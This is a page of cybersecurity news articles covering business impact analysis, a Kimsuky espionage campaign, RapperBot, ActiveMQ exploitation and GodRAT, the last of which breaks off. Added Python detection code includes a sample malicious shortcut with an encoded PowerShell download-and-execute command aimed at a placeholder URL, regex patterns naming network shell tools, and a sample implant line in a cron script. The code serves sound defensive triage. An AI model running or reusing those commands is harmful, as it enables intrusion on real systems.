Tag: Cyber Security

  • From Impact to Action: Turning BIA Insights Into Resilient Recovery

    From Impact to Action: Turning BIA Insights Into Resilient Recovery

    Modern businesses face a rapidly evolving and expanding threat landscape, but what does this mean for your business? It means a growing number of risks, along with an increase in their frequency, variety, complexity, severity, and potential business impact.

The real question is, “How do you tackle these rising threats?” The answer lies in having a robust business continuity and disaster recovery (BCDR) strategy. However, to build a rock-solid BCDR plan, you must first conduct a business impact analysis (BIA). Read on to learn what a BIA is and how it forms the foundation of an effective BCDR strategy.

    What Is a BIA?

    A BIA is a structured approach to identifying and evaluating the operational impact of disruptions across departments. Disruptive incidents or emergencies can occur due to several factors, such as cyberattacks, natural disasters or supply chain issues.

    Conducting a BIA helps identify critical functions for a business’s operations and survival. Businesses can use insights from BIA to develop strategies to resume those functions first to maintain core services in the event of a crisis.

    It informs key priorities, such as the recovery time objective (RTO) and recovery point objective (RPO) written into service-level agreements (SLAs), and aligns technological capabilities proportionally with the level of threat and risk, both of which are critical for continuity and recovery planning.

    The IT Leader’s Role in Enabling an Effective BIA

    While business continuity, risk, or compliance teams often lead business impact analysis, IT leaders play a crucial role in making it work. They bring critical visibility into system dependencies and infrastructure across the organization. They provide valuable insights into what’s technically feasible when disaster strikes. IT leaders also play a key part in validating recovery commitments, whether the set RTO and RPO goals can be achieved within the current infrastructure, or if upgrades are needed.

    IT leaders operationalize the recovery strategy with appropriate tooling, from selecting and configuring DR tools to automating failover processes. This helps ensure the recovery plan is executable, integrated into everyday operations, tested and ready to scale with the business.

    In SMBs or IT-led orgs, IT often leads the BIA by necessity. Because of their cross-functional view of operations, infrastructure and business continuity, IT leaders are uniquely positioned to drive the BIA.

    Pro Tip: IT’s involvement ensures the BIA isn’t just a business document; it becomes an actionable recovery plan.

    Identifying Threat Vectors

    Before you can protect what matters, you must understand what threatens it. Assess the threat landscape facing your organization and tailor your response plan based on industry, geographic risk and operational profile.

    Here are the key threat vectors to consider:

    • Cyberthreats: From ransomware to insider threats and credential compromise, cyberattacks are growing in complexity, frequency and severity. One weak point in your defense systems can lead to massive data loss and operational downtime.
    • Natural Disasters: Events like hurricanes, wildfires, floods and earthquakes strike fast and hard. The effects of these events can ripple across regions, disrupting supply chains, data centers and physical offices.
    • Operational Disruptions: Unexpected outages due to power failure, software bugs or network downtime can bring daily operations to a grinding halt if you aren’t prepared.
    • Human Error: Anyone, including your best employees, can make mistakes. Accidental deletions or misconfigurations can lead to costly downtime.
    • Regulatory and Compliance Risks: Data breaches and data loss can not only hurt your business financially but also lead to legal issues and compliance violations.
    Fig 1: Impact analysis of different threats

    Industry-specific risks

    Every sector operates in its own unique way and relies on different systems to stay up and running. Certain threats can hinder those systems and core functions more than others. Here are a few examples to guide you in identifying and prioritizing threats based on industry.

    Healthcare

    If you operate in the healthcare sector, ransomware and system availability must be your top priorities since any disruption or downtime can directly impact patient care and safety. As regulations like HIPAA get more stringent, data protection and privacy become critical to meet compliance requirements.

    Education

    Phishing and account compromise attacks targeting staff and students are common in the education sector. Additionally, the rise of hybrid learning environments has expanded the threat surface, stretching across student endpoints, SaaS platforms and on-premises servers. To make matters more challenging, many institutions operate with limited IT staff and resources, making them more vulnerable to human error, slower threat detection and delayed response times.

    Manufacturing and Logistics

    In manufacturing and logistics, operational technology (OT) uptime is mission-critical as downtime caused by power failures, network outages or system disruptions can halt production lines and delay deliveries. Unlike traditional IT environments, many OT systems aren’t easily backed up or virtualized, requiring specific DR considerations. Moreover, any disruption to just-in-time (JIT) supply chains can delay inventory, increase costs and jeopardize vendor relationships.

    As you build your BIA threat matrix, score each threat by likelihood and impact:

    • What’s the chance this will occur in the next one to three years?
    • If it happens, what systems, people and business functions will it affect?
    • Can this threat create a cascading failure?

    Prioritization helps you focus recovery resources where the risk is highest and the cost of downtime is greatest.

    Running the BIA

    Follow these steps to conduct a BIA to strengthen your recovery strategy:

    1. Identify and List Critical Business Functions

    Knowing what matters most for your business’s survival is critical for designing effective BCDR plans that align with your business requirements.

    • Work with department heads to identify critical business functions and associate them with the IT assets, apps and services that support them.

    2. Assess the Impact of Downtime

    The impact of downtime scales with its duration: a short outage may be a nuisance, while a prolonged one can halt operations entirely.

    • It’s important to evaluate the consequences across revenue, compliance, productivity and reputation.
    • Categorize business functions by impact severity (e.g., high, medium, low).

    3. Define RTOs and RPOs

    RTOs and RPOs are critical benchmarks that define how quickly your systems must be restored and how much data loss your organization can endure.

    Work with business and technical teams to establish:

    • RTO: Maximum acceptable downtime.
    • RPO: Maximum acceptable data loss.

    4. Prioritize Systems and Data

    When the unexpected occurs, being able to recover quickly can help maintain business continuity and minimize downtime risks.

    • Create a backup and recovery plan by linking each impact tier to the IT assets and applications that the functions in that tier rely on.

    5. Document Dependencies

    Documenting dependencies between business functions and IT systems is important to understand the critical links between them, ensure accurate impact assessments and drive effective recovery planning.

    • Include infrastructure, SaaS tools, third-party integrations and interdependent apps.
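The five steps above can be mechanized, and doing so surfaces the one thing a spreadsheet BIA usually misses: a function cannot recover faster than the slowest asset anywhere on its dependency chain. The following is an added example (not part of the original article and not a Datto feature): it models business functions, the assets that hold or run them, and asset-to-asset dependencies, then derives the recovery tier each asset inherits, lists functions whose stated maximum downtime cannot be met and names the bottleneck, and reports shared assets whose loss would cascade across several functions. The function and asset names and all hour values are constructed sample data; the example assumes restores run in parallel and a function is available only when every asset in its chain is back.

```python
from dataclasses import dataclass, field


@dataclass
class Asset:
    """An IT asset (server, SaaS tool, network service) with the RTO/RPO IT can currently deliver."""
    name: str
    rto_hours: float
    rpo_hours: float
    depends_on: list = field(default_factory=list)   # names of other assets this one needs


@dataclass
class Function:
    """A business function from step 1 with its impact rating (step 2) and tolerances (step 3)."""
    name: str
    impact: str                  # "high", "medium" or "low"
    max_downtime_hours: float    # business-stated RTO
    max_data_loss_hours: float   # business-stated RPO
    assets: list = field(default_factory=list)       # assets that directly hold or run this function


TIER_BY_IMPACT = {"high": 1, "medium": 2, "low": 3}


def closure(asset, assets):
    """The asset plus everything it transitively depends on (step 5); safe on cyclic graphs."""
    seen, stack = {asset}, list(assets[asset].depends_on)
    while stack:
        cur = stack.pop()
        if cur not in seen:
            seen.add(cur)
            stack.extend(assets[cur].depends_on)
    return seen


def effective_rto(asset, assets):
    """Assumes restores run in parallel: the asset is usable once the slowest link is back."""
    return max(assets[a].rto_hours for a in closure(asset, assets))


def bottleneck(asset, assets):
    """The asset on the chain whose own RTO sets the effective RTO."""
    return max(closure(asset, assets), key=lambda a: assets[a].rto_hours)


def asset_tiers(functions, assets):
    """Each asset inherits the best (lowest) tier of any function that relies on it, even indirectly."""
    tiers = {}
    for fn in functions:
        for top in fn.assets:
            for a in closure(top, assets):
                tiers[a] = min(tiers.get(a, 99), TIER_BY_IMPACT[fn.impact])
    return tiers


def recovery_gaps(functions, assets):
    """Functions whose tolerances the current recovery commitments cannot meet.
    RPO is checked only on the assets holding the function's data, not on upstream dependencies."""
    gaps = []
    for fn in functions:
        for top in fn.assets:
            eff = effective_rto(top, assets)
            if eff > fn.max_downtime_hours:
                gaps.append((fn.name, "RTO", bottleneck(top, assets), eff, fn.max_downtime_hours))
            if assets[top].rpo_hours > fn.max_data_loss_hours:
                gaps.append((fn.name, "RPO", top, assets[top].rpo_hours, fn.max_data_loss_hours))
    return gaps


def shared_dependencies(functions, assets, threshold=2):
    """Assets whose loss cascades into several functions (the 'cascading failure' question)."""
    users = {}
    for fn in functions:
        for top in fn.assets:
            for a in closure(top, assets):
                users.setdefault(a, set()).add(fn.name)
    return {a: sorted(f) for a, f in users.items() if len(f) >= threshold}


# Constructed sample data for this example; not taken from any real organization.
ASSETS = {a.name: a for a in [
    Asset("Network core", rto_hours=1, rpo_hours=0),
    Asset("Active Directory", rto_hours=8, rpo_hours=24, depends_on=["Network core"]),
    Asset("Core DB", rto_hours=2, rpo_hours=1, depends_on=["Network core"]),
    Asset("ERP", rto_hours=4, rpo_hours=1, depends_on=["Core DB", "Active Directory"]),
    Asset("HR SaaS", rto_hours=24, rpo_hours=24, depends_on=["Active Directory"]),
]}
FUNCTIONS = [
    Function("Order processing", "high", max_downtime_hours=4, max_data_loss_hours=1, assets=["ERP"]),
    Function("Payroll", "medium", max_downtime_hours=48, max_data_loss_hours=24, assets=["HR SaaS"]),
    Function("Visitor Wi-Fi", "low", max_downtime_hours=72, max_data_loss_hours=72, assets=["Network core"]),
]

if __name__ == "__main__":
    print("tiers:", asset_tiers(FUNCTIONS, ASSETS))
    print("gaps:", recovery_gaps(FUNCTIONS, ASSETS))
    print("shared:", shared_dependencies(FUNCTIONS, ASSETS))
```

With the sample data, Active Directory and the network core land in tier 1 even though only a low-impact function names the network directly, and Order processing misses its 4-hour target because the 8-hour Active Directory RTO sits on its chain. That is exactly the kind of finding step 5 exists to surface, and it is what decides whether the fix is a tighter backup schedule or an infrastructure upgrade.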

    Turn Insights Into Action With Datto BCDR

    A well-executed BIA lays the foundation for a resilient, recovery-ready organization. It provides the essential data to make risk-based, cost-effective decisions. While BIA offers valuable insights into recovery objectives, dependencies and risks, Datto turns those insights into automated, repeatable recovery actions.

    Datto provides a unified platform for backup, disaster recovery, ransomware detection, business continuity and disaster recovery orchestration. It offers policy-based backups, allowing you to use RTO and RPO findings to assign backup frequency and retention. You can create tiered backup schedules based on criticality to strengthen data protection, optimize resources and costs, and ensure fast, targeted recovery.

    Datto’s Inverse Chain Technology and image-based backups reduce storage footprint while maximizing recovery performance by storing every previous recovery point in an independent, fully constructed state on the Datto device or the Datto cloud. They simplify backup chain management and speed up recovery.

    Datto 1-Click Disaster Recovery lets you test and define DR runbooks in the Datto Cloud that are executable with just a single click.

    Whether you are protecting data stored on endpoints, SaaS platforms or on-premises servers, Datto has you covered. It regularly validates recovery configurations with screenshots and test results, and uses test automation to verify that you meet RTOs under real conditions.

    Datto detects abnormal file change behavior to protect your backups and prevent them from being corrupted by ransomware. It seamlessly integrates with BCDR workflows to support rapid recovery to the pre-attack state.

    In a fast-changing business environment where threats loom large and operational downtime isn’t an option, resilience is your competitive advantage. The BIA is your map, and Datto is your vehicle.

    Get customized Datto BCDR pricing today. Discover how our solutions help you stay operational and secure, regardless of the circumstances.


    Source: thehackernews.com…

  • North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms

    North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms

    North Korean threat actors have been attributed to a coordinated cyber espionage campaign targeting diplomatic missions in South Korea between March and July 2025.

    The activity manifested in the form of at least 19 spear-phishing emails that impersonated trusted diplomatic contacts with the goal of luring embassy staff and foreign ministry personnel with convincing meeting invites, official letters, and event invitations.

    “The attackers leveraged GitHub, typically known as a legitimate developer platform, as a covert command-and-control channel,” Trellix researchers Pham Duy Phuc and Alex Lanstein said.

    The infection chains have been observed to rely on trusted cloud storage services like Dropbox and Daum Cloud, an online service from South Korean internet conglomerate Kakao Corporation, to deliver a variant of an open-source remote access trojan called Xeno RAT that lets the threat actors take control of compromised systems.

    The campaign is assessed to be the work of a North Korean hacking group called Kimsuky, which was recently linked to phishing attacks that employ GitHub as a stager for a Xeno RAT variant known as MoonPeak. Despite the infrastructure and tactical overlaps, there are indications that the operators behind the phishing attacks are based in China.

    The email messages, per Trellix, are carefully crafted to appear legitimate, often spoofing real diplomats or officials so as to entice recipients into opening password-protected malicious ZIP files hosted on Dropbox, Google Drive, or Daum. The messages are written in Korean, English, Persian, Arabic, French, and Russian.

    “The spear-phishing content was carefully crafted to mimic legitimate diplomatic correspondence,” Trellix said. “Many emails included official signature, diplomatic terminology, and references to real events (e.g., summits, forums, or meetings).”

    “The attackers impersonated trusted entities (embassies, ministries, international organizations), a long-running Kimsuky tactic. By strategically timing lures alongside real diplomatic happenings, they enhanced the credibility.”


    Present within the ZIP archive is a Windows shortcut (LNK) masquerading as a PDF document. Launching it executes PowerShell code that, in turn, runs an embedded payload, which reaches out to GitHub to fetch the next-stage malware and establishes persistence through scheduled tasks. In parallel, a decoy document is displayed to the victim.

    The script is also designed to harvest system information and exfiltrate the details to an attacker-controlled private GitHub repository, while simultaneously retrieving additional payloads by parsing the contents of a text file (“onf.txt”) in the repository to extract the Dropbox URL hosting the MoonPeak trojan.

    “By simply updating onf.txt in the repository (pointing to a new Dropbox file), the operators could rotate payloads to infected machines,” Trellix explained.

    “They also practiced ‘rapid’ infrastructure rotation: log data suggests that the ofx.txt payload was updated multiple times in an hour to deploy malware and to remove traces after use. This rapid update cycle, combined with the use of cloud infrastructure, helped the malicious activities fly under the radar.”
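The LNK-to-PowerShell stage described above is where a defender can triage a sample without detonating it, because the shortcut's target, arguments and window state are all stored in plain fields. The following is an added example, not code from Trellix or the original article: it parses the Shell Link (MS-SHLLINK) header and StringData fields of a .lnk file, decodes any -EncodedCommand argument (base64 of a UTF-16LE script), and flags the traits the text describes: a document-looking name, a script host as the real target, a hidden window, an encoded command, and a fetch from GitHub or other cloud storage. The sample shortcut it builds, including the GitHub URL inside its payload, is constructed for the example and is not an indicator from the campaign.

```python
import base64
import re
import struct
import uuid

# LinkFlags bits from the Shell Link binary format (MS-SHLLINK, section 2.1.1).
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# StringData fields appear in this fixed order when their flag is set.
STRING_DATA = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
               (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"))
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
HEADER_SIZE = 0x4C
SW_SHOWMINNOACTIVE = 7      # ShowCommand value that keeps the console window from appearing

SUSPICIOUS_ARG_PATTERNS = (
    r"-(?:w|windowstyle)\s+hidden",
    r"-(?:ep|executionpolicy)\s+bypass",
    r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}",
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression",
    r"github\.com|githubusercontent\.com|dropbox\.com|drive\.google\.com",
    r"schtasks|register-scheduledtask",
)


def parse_lnk(data):
    """Read ShowCommand and the StringData fields; LinkTargetIDList and LinkInfo are skipped by size."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    for bit, name in STRING_DATA:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * width]
            info[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
            pos += 2 + count * width
    return info


def decode_encoded_command(args):
    """PowerShell -EncodedCommand carries base64 of a UTF-16LE script; return it or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", args, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(filename, data):
    """Return (findings, decoded_script) for one shortcut file."""
    info = parse_lnk(data)
    findings = []
    if re.search(r"\.(?:pdf|docx?|xlsx?|pptx?|hwp|txt)\.lnk$", filename, re.I):
        findings.append(f"double extension: {filename}")
    target = info.get("relative_path", "")
    if re.search(r"(?:powershell|pwsh|cmd|mshta|wscript|cscript|rundll32)\.exe$", target, re.I):
        findings.append(f"script host as target: {target}")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (window hidden)")
    args = info.get("arguments", "")
    decoded = decode_encoded_command(args)
    haystack = args + "\n" + (decoded or "")     # match on the raw and the decoded command line
    for pat in SUSPICIOUS_ARG_PATTERNS:
        if re.search(pat, haystack, re.I):
            findings.append(f"argument pattern: {pat}")
    icon, target_base = info.get("icon_location", ""), target.rsplit("\\", 1)[-1].lower()
    if icon and target_base and target_base not in icon.lower():
        findings.append(f"icon borrowed from another file: {icon}")
    return findings, decoded


def build_lnk(relative_path, arguments, icon_location, show_command=SW_SHOWMINNOACTIVE):
    """Assemble a minimal .lnk (header plus three Unicode StringData fields) for testing."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID
    header += struct.pack("<II", flags, 0x20)                          # LinkFlags, FileAttributes
    header += bytes(24)                                                # Creation/Access/Write FILETIMEs
    header += struct.pack("<IiIHHII", 0, 0, show_command, 0, 0, 0, 0)  # FileSize, IconIndex, ShowCommand, HotKey, Reserved1..3
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments, icon_location))
    return header + body


def build_sample():
    """Constructed sample resembling the chain in the text; the URL is hypothetical, not a campaign IOC."""
    script = ("$u='https://raw.githubusercontent.com/example-org/example-repo/main/onf.txt';"
              "IEX (New-Object Net.WebClient).DownloadString($u)")
    enc = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     f"-w hidden -ep bypass -enc {enc}", r"%SystemRoot%\System32\imageres.dll")


if __name__ == "__main__":
    findings, decoded = triage("Invitation.pdf.lnk", build_sample())
    print("\n".join(findings))
    print("decoded:", decoded)
```

The parser deliberately stops at StringData and ignores the optional ExtraData blocks that follow; for attribution work those blocks (TrackerDataBlock, EnvironmentVariableDataBlock) are worth reading too, since they leak the machine name and environment of the host where the shortcut was built. A benign shortcut pointing at a document with no arguments produces no findings, so the checks can be run over an entire mail quarantine without drowning in noise.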

    Interestingly, the cybersecurity company’s time-based analysis of the attackers’ activity has found it to be largely originating from a timezone that’s consistent with China, with a smaller proportion aligning with that of the Koreas. To add to the intrigue, a “perfect 3-day pause” was observed coinciding with Chinese national holidays in early April 2025, but not during North or South Korean holidays.

    This has raised the possibility that the campaign, mirroring Chinese operational cadence while operating with motives that align with North Korea, is likely the result of –

    • North Korean operatives working from Chinese territory
    • A Chinese APT operation mimicking Kimsuky techniques, or
    • A collaborative effort leveraging Chinese resources for North Korean intelligence gathering efforts

    With North Korean cyber actors frequently stationed in China and Russia, as observed in the case of the remote information technology (IT) worker fraud scheme, Trellix said with medium confidence that the operators are based in China or are culturally Chinese.

    “The use of Korean services and infrastructure was likely intentional to blend into the South Korean network,” Trellix said. “It’s a known Kimsuky trait to operate out of Chinese and Russian IP space while targeting South Korea, often using Korean services to mask their traffic as legitimate.”

    N. Korea IT Worker Infiltrates 100s of Companies

    The disclosure comes as CrowdStrike revealed that it has identified more than 320 incidents over the past 12 months where North Koreans posing as remote IT workers have infiltrated companies to generate illicit revenue for the regime, a 220% jump from last year.

    The IT worker scheme, tracked as Famous Chollima and Jasper Sleet, is believed to use generative artificial intelligence (GenAI) coding assistants and editors like Microsoft Copilot or VSCodium, along with translation tools, to help with daily tasks and to respond to instant messages and emails. The workers are also likely to hold three or four jobs simultaneously.


    A crucial component of these operations is recruiting people to run laptop farms: racks of corporate-issued laptops that the North Koreans control remotely with tools like AnyDesk, so that their work appears to originate from the country where the employing companies are based.

    “Famous Chollima IT workers use GenAI to create attractive résumés for companies, reportedly use real-time deepfake technology to mask their true identities in video interviews, and leverage AI code tools to assist in their job duties, all of which pose a substantial challenge to traditional security defenses,” the company said.

    What’s more, a leak of 1,389 email addresses linked to the IT workers has uncovered that 29 of the 63 unique email service providers are online tools that allow users to create temporary or disposable email addresses, while another six are related to privacy-focused services like Skiff, Proton Mail, and SimpleLogin. Nearly 89% of the email addresses are Gmail accounts.

    “All the Gmail accounts are guarded using Google Authenticator, 2FA, and Recovery BackUp Email,” security researcher Rakesh Krishnan said. “Many usernames include terms like developer, code, coder, tech, software, indicating a tech or programming focus.”

    Some of these email addresses are present in a user database leak of the AI photo editing tool Cutout.Pro, suggesting potential use of the software to alter images for social media profiles or identification documents.


    Source: thehackernews.com…

  • DOJ Charges 22-Year-Old for Running RapperBot Botnet Behind 370,000 DDoS Attacks

    DOJ Charges 22-Year-Old for Running RapperBot Botnet Behind 370,000 DDoS Attacks

    Aug 20, 2025 | Ravie Lakshmanan | Botnet / Cybercrime


    A 22-year-old man from the U.S. state of Oregon has been charged with allegedly developing and overseeing a distributed denial-of-service (DDoS)-for-hire botnet called RapperBot.

    Ethan Foltz of Eugene, Oregon, has been identified as the administrator of the service, the U.S. Department of Justice (DoJ) said. The botnet has been used to carry out large-scale DDoS-for-hire attacks targeting victims in over 80 countries since at least 2021.

    Foltz has been charged with one count of aiding and abetting computer intrusions. If convicted, he faces a maximum penalty of 10 years in prison. In addition, law enforcement authorities conducted a search of Foltz’s residence on August 6, 2025, seizing administrative control of the botnet infrastructure.


    “RapperBot, aka ‘Eleven Eleven Botnet’ and ‘CowBot,’ is a Botnet that primarily compromises devices like Digital Video Recorders (DVRs) or Wi-Fi routers at scale by infecting those devices with specialized malware,” the DoJ said.

    “Clients of Rapper Bot then issue commands to those infected victim devices, forcing them to send large volumes of ‘distributed denial-of-service’ (DDoS) traffic to different victim computers and servers located throughout the world.”

    Heavily inspired by fBot (aka Satori) and Mirai botnets, RapperBot is known for its ability to break into target devices using SSH or Telnet brute-force attacks and co-opt them into a malicious network capable of launching DDoS attacks. It was first publicly documented by Fortinet in August 2022, with early campaigns observed as far back as May 2021.

    A 2023 report from Fortinet detailed the DDoS botnet’s expansion into cryptojacking, profiting off the compromised devices’ compute resources to illicitly mine Monero and maximize value. Earlier this year, RapperBot was also implicated in DDoS attacks targeting DeepSeek and X.

    Foltz and his co-conspirators have been accused of monetizing RapperBot by providing paying customers access to a powerful DDoS botnet that has been used to conduct over 370,000 attacks, targeting 18,000 unique victims across China, Japan, the United States, Ireland and Hong Kong from April 2025 to early August 2025.


    Prosecutors also allege that the botnet comprised roughly 65,000 to 95,000 infected victim devices and launched DDoS attacks that measured between two and three terabits per second (Tbps), with the largest attack likely exceeding 6 Tbps. The botnet is also believed to have been used to carry out ransom DDoS attacks aimed at extorting victims.

    The investigation traced the botnet to Foltz after uncovering IP address links to various online services used by the defendant, including PayPal, Gmail, and the internet service provider. Foltz is also said to have searched on Google for references to “RapperBot” or “Rapper Bot” over 100 times.

    The disruption of RapperBot is part of Operation PowerOFF, an ongoing international effort that’s designed to dismantle criminal DDoS-for-hire infrastructures worldwide.


    Source: thehackernews.com…

  • Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems

    Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems

    Aug 19, 2025 | Ravie Lakshmanan | Linux / Malware

    Threat actors are exploiting a nearly two-year-old security flaw in Apache ActiveMQ to gain persistent access to cloud Linux systems and deploy malware called DripDropper.

    But in an unusual twist, the unknown attackers have been observed patching the exploited vulnerability after securing initial access to prevent further exploitation by other adversaries and evade detection, Red Canary said in a report shared with The Hacker News.

    “Follow-on adversary command-and-control (C2) tools varied by endpoint and included Sliver, and Cloudflare Tunnels to maintain covert command and control over the long term,” researchers Christina Johns, Chris Brook, and Tyler Edmonds said.

    The attacks exploit a maximum-severity security flaw in Apache ActiveMQ (CVE-2023-46604, CVSS score: 10.0), a remote code execution vulnerability that could be exploited to run arbitrary shell commands. It was addressed in late October 2023.


    The security defect has since come under heavy exploitation, with multiple threat actors leveraging it to deploy a wide range of payloads, including HelloKitty ransomware, Linux rootkits, GoTitan botnet malware, and Godzilla web shell.

    In the attack activity detected by Red Canary, the threat actors have been observed leveraging the access to modify existing sshd configurations to enable root login, granting them elevated access to drop a previously unknown downloader dubbed DripDropper.

    A PyInstaller-packaged Executable and Linkable Format (ELF) binary, DripDropper requires a password to run in a bid to resist analysis. It also communicates with an attacker-controlled Dropbox account, once again illustrating how threat actors increasingly rely on legitimate services to blend in with regular network activity and sidestep detection.

    The downloader ultimately serves as a conduit for two files, one of which carries out a varied set of actions on different endpoints, ranging from process monitoring to contacting Dropbox for further instructions. Persistence of the dropped file is achieved by modifying the 0anacron script found in the /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly and /etc/cron.monthly directories.

    The second file dropped by DripDropper is also designed to contact Dropbox to receive commands, while also altering existing SSH configuration files, likely as a backup mechanism for persistent access. The final stage entails the attacker downloading patched ActiveMQ libraries for CVE-2023-46604 from Apache Maven, effectively plugging the flaw.

    “Patching the vulnerability does not disrupt their operations as they already established other persistence mechanisms for continued access,” the researchers said.
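A host-side check for the two persistence mechanisms described above, as an added example (not Red Canary's tooling and not from the original article): it inspects each /etc/cron.*/0anacron script for lines a distribution-shipped version never contains (downloads, decoders, backgrounded binaries, world-writable paths) and audits sshd_config for root-login enablement, authorized-keys files outside home directories, unexpected Include paths and duplicate keywords. The duplicate check matters because sshd honors the first occurrence of a keyword, so a PermitRootLogin line inserted above the original silently wins while the original still reads "no". The sample file contents are constructed for the example.

```python
import re
from pathlib import Path

CRON_DIRS = ["/etc/cron.hourly", "/etc/cron.daily", "/etc/cron.weekly", "/etc/cron.monthly"]

# A distro-shipped 0anacron only checks timestamps and calls anacron; it never fetches,
# decodes or backgrounds anything, and never touches world-writable directories.
CRON_SUSPECT = re.compile(
    r"\b(?:curl|wget|python[0-9.]*|perl|base64|nohup|nc|ncat|bash\s+-c)\b"
    r"|/dev/tcp/|/tmp/|/var/tmp/|/dev/shm/|chmod\s+\+?x|\|\s*sh\b",
    re.IGNORECASE)


def audit_cron_script(label, text):
    """Return suspicious non-comment lines from one cron script."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0]
        m = CRON_SUSPECT.search(code)
        if m:
            findings.append(f"{label}:{n}: '{m.group(0)}' in: {line.strip()}")
    return findings


def audit_sshd_config(text):
    """Flag root-login enablement, key files outside home dirs, odd Includes and duplicate keywords.
    Keywords are tracked per Match scope because a Match block may legitimately re-specify them."""
    findings, first_seen, scope = [], {}, "global"
    for n, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0].strip()
        if not code:
            continue
        parts = re.split(r"[\s=]+", code, maxsplit=1)      # "Keyword value" or "Keyword=value"
        key, value = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")
        if key == "match":
            scope = value
            continue
        if (scope, key) in first_seen:
            findings.append(f"line {n}: duplicate {key!r} in {scope} scope; sshd honors line {first_seen[(scope, key)]}")
        else:
            first_seen[(scope, key)] = n
        if key in ("permitrootlogin", "permitemptypasswords") and value.lower() == "yes":
            findings.append(f"line {n}: {code}")
        elif key == "authorizedkeysfile":
            for path in value.split():
                if path.startswith("/") and not path.startswith(("/home/", "/root/")):
                    findings.append(f"line {n}: AuthorizedKeysFile outside a home directory: {path}")
        elif key == "include" and not value.startswith("/etc/ssh/"):
            findings.append(f"line {n}: Include from unexpected location: {value}")
    return findings


def audit_host():
    """Run both checks against the live system (needs read access to /etc)."""
    findings = []
    for d in CRON_DIRS:
        p = Path(d) / "0anacron"
        if p.is_file():
            findings += audit_cron_script(str(p), p.read_text(errors="replace"))
    sshd = Path("/etc/ssh/sshd_config")
    if sshd.is_file():
        findings += [f"{sshd}: {x}" for x in audit_sshd_config(sshd.read_text(errors="replace"))]
    return findings


# Constructed sample inputs for this example; the appended nohup line stands in for an implant.
SAMPLE_0ANACRON = """#!/bin/sh
# constructed example of a 0anacron script with one appended line
if test -r /var/spool/anacron/cron.daily; then
    day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
    exit 0
fi
/usr/sbin/anacron -s
nohup /var/tmp/.x/update >/dev/null 2>&1 &
"""

SAMPLE_SSHD = """# constructed sshd_config excerpt
Port 22
PermitRootLogin yes
PasswordAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys /dev/shm/.k
Include /etc/ssh/sshd_config.d/*.conf
Subsystem sftp /usr/lib/openssh/sftp-server
PermitRootLogin no
Match User backup
    PermitRootLogin no
"""

if __name__ == "__main__":
    for f in audit_cron_script("/etc/cron.daily/0anacron", SAMPLE_0ANACRON) + audit_sshd_config(SAMPLE_SSHD):
        print(f)
```

Pair the heuristic with integrity data where it exists: `rpm -V` or `dpkg --verify` on the package that owns 0anacron reports a changed checksum regardless of what was appended, and `sshd -T` prints the effective configuration so a hidden first-occurrence override shows up as `permitrootlogin yes` even when the visible line says otherwise.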


    While certainly rare, the technique is not new. Last month, France’s national cybersecurity agency ANSSI detailed a China-nexus initial access broker employing the same approach: patching the exploited flaw to secure its own access, keep other threat actors from using the same weakness to get in, and mask the initial access vector.

    The campaign offers a timely reminder for why organizations need to apply patches in a timely fashion, limit access to internal services by configuring ingress rules to trusted IP addresses or VPNs, and monitor logging for cloud environments to flag anomalous activity.


    Source: thehackernews.com…

  • New GodRAT Trojan Targets Trading Firms Using Steganography and Gh0st RAT Code

    New GodRAT Trojan Targets Trading Firms Using Steganography and Gh0st RAT Code

    Aug 19, 2025 | Ravie Lakshmanan | Malware / Cyber Attack


    Financial institutions like trading and brokerage firms are the target of a new campaign that delivers a previously unreported remote access trojan called GodRAT.

    The malicious activity involves the “distribution of malicious .SCR (screen saver) files disguised as financial documents via Skype messenger,” Kaspersky researcher Saurabh Sharma said in a technical analysis published today.

